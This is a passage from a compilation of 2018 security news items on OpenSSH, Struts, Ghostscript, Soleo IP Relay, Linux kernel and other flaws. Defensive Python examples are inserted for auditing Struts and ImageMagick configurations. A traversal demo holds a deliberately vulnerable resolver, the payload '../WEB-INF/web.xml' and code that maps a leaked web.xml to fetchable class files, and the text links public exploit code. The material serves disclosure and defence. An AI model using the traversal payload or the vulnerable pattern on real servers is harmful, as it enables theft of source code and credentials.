A vulnerable OpenSSH server, in turn, would respond in two different ways.

If the username included in the malformed authentication request does not exist, the server responds with an authentication failure reply; otherwise, the server closes the connection without a reply.

“The attacker can try to authenticate a user with a malformed packet (for example, a truncated packet), and:

if the user is invalid (it does not exist), then userauth_pubkey() returns immediately, and the server sends an SSH2_MSG_USERAUTH_FAILURE to the attacker;
if the user is valid (it exists), then sshpkt_get_u8() fails, and the server calls fatal() and closes its connection to the attacker.” states the advisory.
“We believe that this issue warrants a CVE; it affects all operating systems, all OpenSSH versions (we went back as far as OpenSSH 2.3.0, released in November 2000), and is easier to exploit than previous OpenSSH username enumerations (which were all timing attacks):”


The flaw could allow an attacker to guess valid usernames registered on an SSH server and then launch brute-force attacks to guess the passwords.

OpenSSH versions 1:6.7p1-1 and 1:7.7p1-1, and the 1:7.7p1-4 unstable branch, have addressed the flaw.

Proof-of-concept code for the vulnerability is already available online:

https://www.exploit-db.com/exploits/45233/
https://github.com/Rhynorater/CVE-2018-15473-Exploit

Security researcher Didier Stevens of NVISO Labs also published a detailed analysis of the flaw that includes instructions for testing servers against it.


Critical Apache Struts 2 Flaw Allows Remote Code Execution
23.8.2018 securityweek
Vulnerebility

Updates released on Wednesday for the Apache Struts 2 open source development framework address a critical vulnerability that can be exploited for remote code execution.

The flaw, tracked as CVE-2018-11776, affects Struts 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Patches are included in Struts 2.3.35 and 2.5.17. A temporary workaround has also been made available, but Struts developers have described it as “weak” and advised users to install the updates as soon as possible.

“It is possible to perform a RCE attack when namespace value isn't set for a result defined in underlying xml configurations and in same time, its upper action(s) configurations have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set and in same time, its upper action(s) configurations have no or wildcard namespace,” Struts developers wrote in an advisory.

The vulnerability was discovered by a researcher from Semmle, a code analysis company that announced its global launch this week, along with $21 million in funding.

Semmle has published a blog post containing technical details on the vulnerability. According to the company, the issue was reported to the Apache Struts Security Team on April 10 and code patches were released on June 25.

“This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers. On top of that, the weakness is related to the Struts OGNL language, which hackers are very familiar with, and are known to have been exploited in the past,” said Man Yue Mo, the Semmle researcher who discovered CVE-2018-11776.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

Semmle has made public only limited details in an effort to prevent malicious exploitation. The company last year discovered another Apache Struts vulnerability that ended up being exploited in the wild. However, the new flaw is even more severe, Man Yue Mo said.

Apache Struts vulnerabilities can pose a significant risk to organizations. A flaw affecting the framework was exploited in the massive Equifax breach that impacted over 140 million individuals.


Unpatched Ghostscript Vulnerabilities Impact Popular Software
23.8.2018 securityweek
Vulnerebility

Ghostscript Impacted by Multiple -dSAFER Sandbox Bypass Vulnerabilities

Unpatched vulnerabilities in Ghostscript impact a broad range of popular software products, including several Linux distributions, CERT/CC reveals in a Tuesday alert.

Ghostscript, a suite of software based on an interpreter for Adobe's PostScript and PDF page description languages, is widely used across stand-alone and web applications, including packages such as GIMP and ImageMagick.

As with other highly popular software, vulnerabilities in Ghostscript are valuable targets for both cybercriminals and threat actors, and such flaws have already been abused by North Korea-linked hackers.

Now, Google Project Zero security researcher Tavis Ormandy says that Ghostscript is impacted by multiple critical vulnerabilities and that “ImageMagick, Evince, GIMP, and most other PDF/PS tools” are impacted as well.

In addition to several -dSAFER sandbox escapes reported a few years ago, the popular interpreter is also impacted by “a few file disclosure, shell command execution, memory corruption and type confusion bugs,” the researcher says.

Although there is a -dSAFER option to prevent unsafe PostScript operations, there are numerous operations that bypass the protections provided by -dSAFER, thus allowing an attacker to execute arbitrary commands with arbitrary arguments, the CERT/CC warns.

In its alert, CERT/CC notes not only that multiple -dSAFER sandbox bypass vulnerabilities impact Ghostscript, but also that they are inherited by every application that leverages the interpreter. These flaws could be exploited by an unauthenticated attacker for remote command execution.

Artifex Software, ImageMagick, Red Hat, and Ubuntu products have already been found to be affected, but other products might be impacted as well. Thus, CERT/CC decided to warn all major software companies about the issue.

One solution to the issue, Ormandy notes, is to disable all the Ghostscript coders in policy.xml. CERT/CC also advises using the policy.xml security policy to disable the processing of PS, EPS, PDF, and XPS content.

“In the short term the advice for distribution to start disabling PS, EPS, PDF and XPS coders by default is the only defense until a fix is available,” Stephen Giguere, Sales Engineer at Synopsys, confirms in an emailed statement for SecurityWeek.

“Ghostscript is used pretty much everywhere and has been for a very long time. Packages like GIMP (a Photoshop alternative) but more important for web applications, ImageMagick are prevalent to the extent of being standard for the processing of PDF files. This exploit has the potential for file system access leading to sensitive data leak and more as it can be the beachhead opportunity for a more comprehensive data breach,” Giguere says.


Microsoft Releases Intel Microcode Patches for Foreshadow Flaws
23.8.2018 securityweek
Vulnerebility

Microsoft this week made available another round of microcode updates created by Intel for mitigating the recently disclosed speculative execution vulnerabilities tracked as Foreshadow and L1 Terminal Fault (L1TF).

The Foreshadow/L1TF vulnerabilities are CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).

A piece of malware installed on a vulnerable system can exploit the flaws to gain access to potentially sensitive data stored in supposedly protected memory. The security holes affect Intel’s Xeon and Core processors.

Intel and other major tech firms have released mitigations which, in combination with the patches released previously for Meltdown, Spectre and other speculative execution vulnerabilities, should prevent attacks.

Microsoft this week released five new updates: KB4346084, KB4346085, KB4346086, KB4346087 and KB4346088. They deliver Intel’s microcode patches for Windows 10 Release To Market (RTM), Windows 10 version 1709 (Fall Creators Update), Windows Server 2016 version 1709 (Server Core), Windows 10 Version 1703 (Creators Update), Windows 10 version 1607 (Anniversary Update), Windows Server 2016, Windows 10 version 1803 (April 2018 Update), and Windows Server version 1803 (Server Core).

The microcode updates are for devices with Skylake, Kaby Lake and Coffee Lake processors, and they resolve Spectre Variant 3a (CVE-2018-3640), Spectre Variant 4 (CVE-2018-3639), and the Foreshadow flaws (CVE-2018-3615, CVE-2018-3620, CVE-2018-3646).

The mitigations for the Foreshadow vulnerabilities should not have a noticeable performance impact on consumer PCs, but performance degradation may be seen on some data center workloads.

According to Microsoft, patching the Foreshadow vulnerabilities may require both software and firmware (microcode) updates, depending on how the system is configured. However, the company says most devices running Windows client operating systems will only need software updates for protection.


Expert discovered a Critical Remote Code Execution flaw in Apache Struts (CVE-2018-11776)
23.8.2018 securityaffairs
Vulnerebility

Maintainers of the Apache Struts 2 open source development framework have released security updates to address a critical remote code execution vulnerability.
Security updates released this week for the Apache Struts 2 open source development framework address a critical RCE vulnerability tracked as CVE-2018-11776.

The vulnerability affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16, and possibly unsupported versions of the framework.

Struts versions 2.3.35 and 2.5.17 include the security updates that address CVE-2018-11776.

Struts developers also published a temporary workaround, but recommend that users install the updates rather than rely on it.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set,” reads the security advisory published by Apache.

Experts warn that it is possible to trigger the RCE flaw when the namespace value isn’t set for a result defined in the underlying XML configuration and, at the same time, its upper action(s) configurations have no or wildcard namespace.

The flaw could also be exploited when using a url tag that doesn’t have value and action set and, at the same time, its upper action(s) configurations have no or wildcard namespace.

The vulnerability was reported by Man Yue Mo from the Semmle Security Research team on April 10; security updates were released on June 25, and the new versions of Struts were released on 22 August 2018.

“This vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework. Due to the fact that this vulnerability affects the core of Struts, there exist multiple separate attack vectors. At the moment, we are aware of two such vectors” reads the technical analysis published by Semmle.

“For your application to be vulnerable to the attack vectors described below, both of the following conditions should hold:

The alwaysSelectFullNamespace flag is set to true in the Struts configuration. Note that this is automatically the case if your application uses the popular Struts Convention plugin.
Your application’s Struts configuration file contains an <action …> tag that does not specify the optional namespace attribute, or specifies a wildcard namespace (e.g. “/*”)”

The experts from Semmle explained that the flaw affects commonly-used endpoints of Struts, which are likely to be exposed.
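As an added example (not Semmle's or Apache's code), here is a small Python audit that reads a struts.xml and reports actions meeting both conditions Semmle lists: the alwaysSelectFullNamespace flag set to true, and a package with no namespace or a wildcard one. It assumes the namespace is declared on the enclosing <package> element as in standard struts.xml files, uses constructed sample configurations, models the Convention plugin (which enables the flag outside the XML) as a parameter, and does not cover the JSP url-tag vector.

```python
"""Audit a struts.xml for the two CVE-2018-11776 preconditions Semmle describes."""
import xml.etree.ElementTree as ET

# Real Struts setting name; Semmle's condition 1 is that it is true.
FULL_NAMESPACE_CONSTANT = "struts.mapper.alwaysSelectFullNamespace"

# Constructed sample (not a real application): both preconditions hold.
VULNERABLE_STRUTS_XML = """
<struts>
  <!-- condition 1: full-namespace selection turned on -->
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>

  <!-- condition 2: package declares no namespace, so its actions have none -->
  <package name="default" extends="struts-default">
    <action name="index" class="com.example.IndexAction">
      <result type="redirectAction">
        <param name="actionName">home</param>
      </result>
    </action>
  </package>

  <!-- condition 2, wildcard form -->
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="status" class="com.example.StatusAction">
      <result>/status.jsp</result>
    </action>
  </package>

  <!-- explicit namespace: not reported -->
  <package name="admin" namespace="/admin" extends="struts-default">
    <action name="users" class="com.example.UsersAction">
      <result>/users.jsp</result>
    </action>
  </package>
</struts>
"""

# Constructed hardened sample: flag off and every package names its namespace.
HARDENED_STRUTS_XML = """
<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="false"/>
  <package name="default" namespace="/" extends="struts-default">
    <action name="index" class="com.example.IndexAction">
      <result type="redirectAction">
        <param name="actionName">home</param>
        <param name="namespace">/</param>
      </result>
    </action>
  </package>
</struts>
"""


def full_namespace_enabled(root, convention_plugin=False):
    """Condition 1. The Convention plugin turns the flag on outside the XML,
    so deployments that ship it should pass convention_plugin=True."""
    if convention_plugin:
        return True
    for const in root.iter("constant"):
        if const.get("name") == FULL_NAMESPACE_CONSTANT:
            return const.get("value", "").strip().lower() == "true"
    return False  # the Struts default is false


def is_unsafe_namespace(namespace):
    """Condition 2: missing namespace, or a wildcard such as "/*"."""
    return namespace is None or namespace.strip() == "" or "*" in namespace


def actions_with_unsafe_namespace(root):
    """Return (package, action, namespace) for each action whose package fails condition 2."""
    findings = []
    for package in root.iter("package"):
        namespace = package.get("namespace")
        if not is_unsafe_namespace(namespace):
            continue
        for action in package.iter("action"):
            findings.append((package.get("name", "?"), action.get("name", "?"), namespace))
    return findings


def audit_struts_xml(xml_text, convention_plugin=False):
    """List actions exposed to the namespace-injection vector; [] when condition 1 fails."""
    root = ET.fromstring(xml_text.strip())
    if not full_namespace_enabled(root, convention_plugin):
        return []
    return actions_with_unsafe_namespace(root)


if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_STRUTS_XML), ("hardened", HARDENED_STRUTS_XML)):
        findings = audit_struts_xml(text)
        print(f"{label}: {len(findings)} exposed action(s)")
        for package, action, namespace in findings:
            print(f"  package={package} action={action} namespace={namespace!r}")
```

A clean result only covers the struts.xml side of the two vectors; the fix described above is upgrading to Struts 2.3.35 or 2.5.17.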

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

Apache Struts flaws are very dangerous for organizations; one of them was the root cause of the massive Equifax breach that impacted over 140 million people.


Adobe Patches Critical Code Execution Flaws in Photoshop
22.8.2018 securityweek
Vulnerebility

Adobe late on Tuesday released updates for the Windows and macOS versions of Photoshop CC to address two critical remote code execution vulnerabilities.

The flaws impact Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions. The issues have been addressed with the release of versions 19.1.6 and 18.1.6.

The security holes, reported by Kushal Arvind Shah of Fortinet's FortiGuard Labs, have been described by Adobe as memory corruption bugs that can be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

The vulnerabilities are tracked as CVE-2018-12810 and CVE-2018-12811.

While the flaws have been assigned a “critical” severity rating, their priority rating is “3,” which indicates that the affected product has historically not been targeted by malicious actors. In this case, users are advised by Adobe to install the updates “at their discretion.”

Earlier this month, Adobe addressed nearly a dozen vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader with the company’s Patch Tuesday updates for August 2018. None of the flaws have been exploited in the wild.

It’s unclear why the Photoshop CC updates were not included in the Patch Tuesday updates.

Last month, researchers claimed they had found a potentially serious security issue in Adobe’s internal systems, but the company downplayed the impact of the vulnerability saying it was only an XSS flaw.


Critical remote code execution flaws in Ghostscript could allow an attacker to completely take over affected systems
21.8.2018 securityaffairs
Vulnerebility

The popular Google Project Zero white hat hacker Tavis Ormandy has found a critical remote code execution (RCE) vulnerability in Ghostscript.
Ghostscript is an open source suite of software based on an interpreter for Adobe Systems’ PostScript and Portable Document Format (PDF) page description languages.

Ghostscript is multiplatform software written in C; it converts PostScript language files (or EPS) to several raster formats (i.e. PDF, XPS, PCL or PXL).

Many PDF and image editing software such as GIMP and ImageMagick leverage the library to convert file formats.

Ghostscript implements a -dSAFER sandbox protection option for handling untrusted documents; it aims to prevent malicious PostScript operations from being executed.

A couple of years ago, Ormandy disclosed several -dSAFER sandbox escapes in the popular library, at the time he found a few file disclosure, shell command execution, memory corruption and type confusion bugs.

Now Ormandy discovered that the library contains multiple -dSAFER sandbox bypass flaws that could be exploited by a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.

A remote attacker can trigger the flaw by sending a specially crafted malicious file (i.e. PDF, PS, EPS, or XPS) to the victim. Once the victim opens the file with an application that uses the vulnerable software, the attacker is able to execute arbitrary code on the system and take it over.

Artifex Software, the company that maintains the open source software, still hasn’t released any security update to address the vulnerability.

The US-CERT published a security advisory to warn that applications using the Ghostscript library by default to process PostScript content are vulnerable.

“Ghostscript contains multiple -dSAFER sandbox bypass vulnerabilities, which may allow a remote, unauthenticated attacker to execute arbitrary commands on a vulnerable system.” reads the security advisory.

“By causing Ghostscript or a program that leverages Ghostscript to parse a specially-crafted file, a remote, unauthenticated attacker may be able to execute arbitrary commands with the privileges of the Ghostscript code.”


Both RedHat and Ubuntu distros have confirmed that they are affected by this vulnerability.

Ormandy recommends that Linux distros disable the processing of PS, EPS, PDF, and XPS content until the vulnerability is fixed.

“I *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default,” suggested Ormandy.
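The mitigation both Ghostscript items above describe, disabling the PS, EPS, PDF and XPS coders in ImageMagick's policy.xml, can be verified with this added Python check (not Ormandy's, CERT/CC's or ImageMagick's code). The policy fragments are constructed samples in the real policymap format; the hardened one also denies PS2 and PS3, which are further Ghostscript-backed coders not named on the page.

```python
"""Check an ImageMagick policy.xml for the coder denials recommended against the Ghostscript bypasses."""
import xml.etree.ElementTree as ET

# The formats the page says to disable; ImageMagick delegates all of them to Ghostscript.
GHOSTSCRIPT_CODERS = ("PS", "EPS", "PDF", "XPS")

# Constructed sample resembling a permissive policy: nothing stops Ghostscript-backed input.
PERMISSIVE_POLICY_XML = """
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>
"""

# Constructed hardened sample: the four coders from the page plus the PS2/PS3 variants.
HARDENED_POLICY_XML = """
<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="path" rights="none" pattern="@*"/>
  <!-- Ormandy / CERT/CC mitigation: refuse PostScript-family, PDF and XPS input -->
  <policy domain="coder" rights="none" pattern="PS"/>
  <policy domain="coder" rights="none" pattern="PS2"/>
  <policy domain="coder" rights="none" pattern="PS3"/>
  <policy domain="coder" rights="none" pattern="EPS"/>
  <policy domain="coder" rights="none" pattern="PDF"/>
  <policy domain="coder" rights="none" pattern="XPS"/>
</policymap>
"""


def expand_pattern(pattern):
    """Expand the brace-list form some distributions use, e.g. "{PS,PDF}" -> ["PS", "PDF"]."""
    pattern = pattern.strip()
    if pattern.startswith("{") and pattern.endswith("}"):
        return [p.strip().upper() for p in pattern[1:-1].split(",") if p.strip()]
    return [pattern.upper()]


def denied_coders(policy_xml):
    """Return the set of coder names the policymap denies outright (rights="none").
    A "*" entry means every coder is denied."""
    root = ET.fromstring(policy_xml.strip())
    denied = set()
    for policy in root.iter("policy"):
        if policy.get("domain", "").lower() != "coder":
            continue
        if policy.get("rights", "").strip().lower() != "none":
            continue
        denied.update(expand_pattern(policy.get("pattern", "")))
    return denied


def enabled_ghostscript_coders(policy_xml):
    """The Ghostscript-backed coders the policy still allows; [] means the mitigation is complete."""
    denied = denied_coders(policy_xml)
    if "*" in denied:
        return []
    return [coder for coder in GHOSTSCRIPT_CODERS if coder not in denied]


if __name__ == "__main__":
    for label, text in (("permissive", PERMISSIVE_POLICY_XML), ("hardened", HARDENED_POLICY_XML)):
        print(f"{label}: still enabled -> {enabled_ghostscript_coders(text) or 'none'}")
```

Run `enabled_ghostscript_coders` over your distribution's installed policy.xml, then confirm what ImageMagick actually loaded with `identify -list policy`.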


Adobe security updates address 2 critical code execution flaws in Photoshop
21.8.2018 securityaffairs
Vulnerebility

Yesterday Adobe released security updates for two critical code execution vulnerabilities affecting the Windows and macOS versions of Photoshop CC.
Adobe released updates to address two critical code execution flaws that affect the Windows and macOS versions of Photoshop CC.

The vulnerabilities, tracked as CVE-2018-12810 and CVE-2018-12811, are memory corruption issues that could be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

“Adobe has released updates for Photoshop CC for Windows and macOS. These updates resolve critical vulnerabilities in Photoshop CC 19.1.5 and earlier 19.x versions, as well as 18.1.5 and earlier 18.x versions. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Adobe addressed both flaws with the release of versions 19.1.6 and 18.1.6.

The vulnerabilities affect Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions.


The Adobe Patch Tuesday for August 2018 addressed a total of 11 vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader.

None of the patched vulnerabilities has been exploited by attackers in the wild.


Vulnerability in IP Relay Service Impacts Major Canadian ISPs
21.8.2018 securityweek
Vulnerebility

A recently addressed local file disclosure vulnerability in the SOLEO IP Relay service impacted nearly all major Internet service providers (ISPs) in Canada, a security researcher has discovered.

Also known as telecommunications relay services (TRSs), the IP relays developed by Soleo Communications are available through all major ISPs in Canada.

The cloud-based IP Relay service was launched over half a decade ago to allow hearing-impaired individuals and those with speech disorders to place calls through a TTY (text terminal) or other assistive telephone device.

Because of improper input sanitization, these services exposed sensitive user information, Project Insecurity researcher Dominik Penner discovered.

In a report (PDF) published late last week, the security researcher explains that the security flaw could be abused to determine the layout of the IPRelayApp directory and find the location of the source files on the IP Relay server. All of the discovered files could then be downloaded by an attacker, the researcher says.

The files were found to be classes compiled in Java bytecode, but “a determined attacker would easily be able to convert this directly back to source, compromising source code and other sensitive files,” Penner points out.

The source code also includes passwords the servlet uses to communicate with other services, and an attacker able to extract these passwords could then either escalate their privileges on the server or abuse the extracted information in social engineering attacks.

“The end result could be escalated to yield remote code execution, though we were not comfortable attempting to do this before getting in contact with the vendor,” the researcher notes.

Working in collaboration with security researcher Manny Mand, Penner discovered that at least ten Canadian ISPs were running the vulnerable instance of Soleo’s IP Relay. Six of these, Penner says, are the largest telecom providers in Canada.

“[W]e have confirmed that a determined attacker (APT/foreign entity) could leverage this vulnerability to steal passwords from configuration files across multiple providers, compromise said providers using the stolen passwords, and then potentially launch a large scale identity theft operation against Canadians,” the researcher says.

An attacker exploiting the vulnerability could compromise over 30 million Canadian records, he said.

The bug was reported to the vendor on July 19 and was confirmed as patched on August 10.


Flaw in SOLEO IP Relay Service potentially exposed over 30 million Canadian records
20.8.2018 securityaffairs
Vulnerebility

Major Internet service providers (ISPs) in Canada were impacted by a local file disclosure flaw in the SOLEO IP Relay service that was recently addressed.
Almost all major Internet service providers (ISPs) in Canada were impacted by a local file disclosure vulnerability in the SOLEO IP Relay service that was recently addressed.

Telecommunications relay services (TRSs) developed by Soleo Communications are IP relay services used by major Internet service providers (ISPs) in Canada.

The SOLEO IP Relay service is a cloud-based IP Relay service for telecommunications providers that allows people who are deaf, hard of hearing, or have a speech disorder to place calls through a TTY or other assistive telephone device.

According to Project Insecurity researcher Dominik Penner, the flaw stems from improper input sanitization and leads to the exposure of sensitive user information.

“This vulnerability exists due to the fact that there is improper sanitization on the “page” GET parameter in servlet/IPRelay. A developer should always check for dangerous characters in filenames. In this case, we were able to navigate our way through the server and into the WEB-INF directory by using directory traversal characters (../)” states the vulnerability report published by the researcher.

The impact of such a vulnerability is severe: a foreign attacker could trigger it to compromise over 30 million Canadian records.

An attacker can exploit the security vulnerability to determine the composition of the IPRelayApp directory and find the location of the source files on the IP Relay server and then download them.

The experts highlighted that the WEB-INF directory sits within the IPRelayApp directory, which means they were able to load web.xml, an XML document that contains mappings Tomcat uses to determine where to pull certain files from.

“At this point, we wrote a nice little proof-of-concept to parse the web.xml file and find the location of the source files.” continues the report.

“All of the following files can be downloaded by loading them from WEB-INF/classes/*. Once again, to confirm severity, we tried to load one of these files. After loading this file into our text editor, it was evident that these classes had been compiled in Java bytecode. However, a determined attacker would easily be able to convert this directly back to source, compromising source code and other sensitive files.”
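The traversal described in the report, rebuilt as an added example (my code, not Soleo's servlet or the Project Insecurity proof-of-concept): a file-serving parameter joined naively onto a base path beside a hardened resolver, plus the web.xml parsing step that turns a leaked descriptor into the class paths an attacker would fetch from WEB-INF/classes. The IPRelayApp layout, the `pages` directory and the sample web.xml are assumptions constructed here so the script runs offline.

```python
"""Directory traversal on a file-serving parameter, vulnerable and hardened.

Added example, not code from Soleo or from the Project Insecurity report.
It models the report's ``page`` parameter in Python: the ``IPRelayApp``
layout, the ``pages`` directory and the sample web.xml are assumptions
constructed here so the script runs offline.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# Constructed deployment descriptor standing in for the real web.xml.
SAMPLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>IPRelay</servlet-name>
    <servlet-class>com.example.relay.IPRelayServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>IPRelay</servlet-name>
    <url-pattern>/servlet/IPRelay</url-pattern>
  </servlet-mapping>
</web-app>
"""


def resolve_unsafe(pages_dir, page):
    """The vulnerable pattern: the request value is glued onto a base path.
    normpath honours '..', so '../WEB-INF/web.xml' walks out of pages_dir."""
    return os.path.normpath(os.path.join(pages_dir, page))


def resolve_safe(pages_dir, page):
    """Hardened resolver: canonicalise both sides and require the result to
    stay inside pages_dir. An absolute ``page`` makes os.path.join drop the
    base entirely, so it fails the same containment check."""
    root = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"page parameter escapes web root: {page!r}")
    return target


def _local(tag):
    """Strip the XML namespace so the parser works on a namespaced web.xml."""
    return tag.rsplit("}", 1)[-1]


def _child_text(el, name):
    for child in el:
        if _local(child.tag) == name and child.text:
            return child.text.strip()
    return None


def servlet_class_paths(web_xml_text):
    """What the report's PoC did with a leaked web.xml: map each url-pattern
    to the compiled class an attacker would then fetch via the same flaw."""
    root = ET.fromstring(web_xml_text)
    classes = {_child_text(el, "servlet-name"): _child_text(el, "servlet-class")
               for el in root.iter() if _local(el.tag) == "servlet"}
    paths = {}
    for el in root.iter():
        if _local(el.tag) == "servlet-mapping":
            cls = classes.get(_child_text(el, "servlet-name"))
            if cls:
                paths[_child_text(el, "url-pattern")] = (
                    "WEB-INF/classes/" + cls.replace(".", "/") + ".class")
    return paths


def demo():
    """Build a throwaway IPRelayApp tree and exercise both resolvers."""
    with tempfile.TemporaryDirectory() as tmp:
        app = os.path.join(tmp, "IPRelayApp")
        pages = os.path.join(app, "pages")
        os.makedirs(pages)
        os.makedirs(os.path.join(app, "WEB-INF"))
        with open(os.path.join(app, "WEB-INF", "web.xml"), "w") as fh:
            fh.write(SAMPLE_WEB_XML)
        with open(os.path.join(pages, "help.html"), "w") as fh:
            fh.write("<p>help</p>")

        payload = "../WEB-INF/web.xml"          # the traversal from the report
        leaked = resolve_unsafe(pages, payload)
        with open(leaked) as fh:
            leaked_xml = fh.read()
        try:
            resolve_safe(pages, payload)
            rejected = False
        except ValueError:
            rejected = True
        return {
            "unsafe_escapes": leaked.endswith(os.path.join("WEB-INF", "web.xml")),
            "safe_rejects": rejected,
            "safe_serves": os.path.isfile(resolve_safe(pages, "help.html")),
            "leaked_mappings": servlet_class_paths(leaked_xml),
        }


if __name__ == "__main__":
    print(demo())
```

The containment check works on the decoded value, which is what a servlet sees after the container has URL-decoded the request, so encoded variants such as `%2e%2e/` are caught the same way; what it does not replace is keeping WEB-INF and other non-public directories outside the servable tree in the first place.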

SOLEO IP relay

An attacker with access to the source code could retrieve the passwords the servlet uses to communicate with other services, escalate privileges on the server, or use the information in further attacks.

“An attacker could extract these passwords from within the source files, and further escalate their privileges on the server, or even use said information in a social engineering attack. The end result could be escalated to yield remote code execution, though we were not comfortable attempting to do this before getting in contact with the vendor” the researcher continues.

Penner found that at least ten major Canadian ISPs were running the vulnerable Soleo IP Relay service.

“To conclude this report, we have confirmed that a determined attacker (APT/foreign entity) could leverage this vulnerability to steal passwords from configuration files across multiple providers, compromise said providers using the stolen passwords, and then potentially launch a large scale identity theft operation against Canadians.” concludes the report.

The expert reported the flaw to SOLEO on July 19 and it was patched on August 10.


Twitch bug may have exposed some users messages to others
20.8.2018 securityaffairs
Vulnerebility

A glitch in the live streaming platform Twitch may have exposed some of its users’ private messages to other users; the company is notifying those affected.

The company sent notifications to some broadcasters informing them that a software bug could have changed the access permissions on older messages, allowing other users to download and read them.

The flaw affected Messages, a feature Twitch recently removed, and exposed some of the messages sent through it.

“I reached out to Twitch for a comment, and a company spokesperson says that it has fixed the bug. It also explained that most of the exposed messages were promotional announcements that went out to everyone who subscribes to certain channels. But it’s possible that this also affected private communications featuring more sensitive information as well.” reported VentureBeat.

Twitch email
Copy of the email sent by Twitch obtained by Bleeping Computer

“In May, we removed a legacy feature called Messages and provided users the ability to download an archive of past messages. Due to a bug in the code that generated the message archive files, which has since been fixed, a small percentage of user messages were included in the wrong archives.” reads the statement from Twitch’s spokesperson.

“The primary use case for Messages was promotion; streamers sending out mass communication to subscribers for example, and the majority of messages that were unintentionally provided to another user fall into that category. We have notified users via email and provided them the affected messages for review. Protecting our users’ privacy is important to us and we have taken actions to ensure this kind of error does not happen in the future.”

According to Twitch, the bug only affected the Messages feature, and there were no private messages sent via the Twitch Whisper systems included in these archives.

Twitch users can discover if their messages were accidentally exposed by visiting the website twitch.tv/messages/archive.

A search on Twitter turns up users reporting that they found other users’ messages in their own archives.

Elspeth Eastman (@elspetheastman), 8:42 PM - Aug 16, 2018:
So uh hey did anyone else get that unsettling email about people possibly downloading your archived Twitch Messages by mistake because I sure did.
“A small percentage of messages were included in the wrong archives”

kaitlyn, solid (@kaitly_n), 9:22 PM - Aug 16, 2018:
at first when i saw my twitch messages were mistakenly sent to other users i was p concerned
so i checked and saw it was just this one.
if anything i should thank @twitch. in fact, everyone can have this message. i'm happy to serve as an example of banning that shit in 2014. 😎

In any case, Twitch has sent a warning to all affected users.


Linux Kernel Project rolled out security updates to fix two DoS vulnerabilities
17.8.2018 securityaffairs
Vulnerebility

Linux kernel maintainers have released security patches for two vulnerabilities, known as SegmentSmack (CVE-2018-5390) and FragmentSmack (CVE-2018-5391), that a remote attacker can exploit to trigger a denial-of-service (DoS) condition.

The vulnerabilities reside in the Linux kernel’s network stack; an attacker can exploit them by sending streams of crafted TCP segments or IP fragments that force the kernel to spend a significant amount of CPU time processing them.

Exhausting the CPU on a vulnerable system can make it unresponsive or force a reboot.
SegmentSmack is triggered by a specially crafted stream of TCP segments, while FragmentSmack is triggered by a specially crafted stream of IP datagrams.

SegmentSmack stems from the cost of the tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions, which the kernel can be forced to call for every incoming segment once the out-of-order queue has been filled with tiny packets; FragmentSmack is the analogous problem in the kernel’s IP fragment reassembly code.

“Juha-Matti Tilli reported that malicious peers could inject tiny packets in out_of_order_queue, forcing very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet.” reads the security advisory.

“With tcp_rmem[2] default of 6MB, the ooo queue could contain ~7000 nodes. “

“Linux kernel versions 4.9+ can be forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service.” states the description provided by the Mitre.

Devices running Linux kernel 4.9 and later are vulnerable to SegmentSmack, while Linux devices running Linux kernel 3.9 and later are vulnerable to FragmentSmack.

Most popular Linux distros, including Debian, Red Hat, and Ubuntu have already rolled out the security updates.

“The Linux kernel project has released an updated version that includes fixes for both [1, 2]. Companies and open source projects that use the Linux kernel for their custom operating systems will have to update the Linux kernel they use to include these two updates.” reported Bleeping Computer.

“Vendors of Linux-based SOHO routers will probably be slower in incorporating these updates. ISP-grade routers, firewall providers, cloud services, and hosting firms will also have to ship or deploy updates.”


CVE-2018-14023 – Recovering expired messages from Signal
17.8.2018 securityaffairs
Vulnerebility

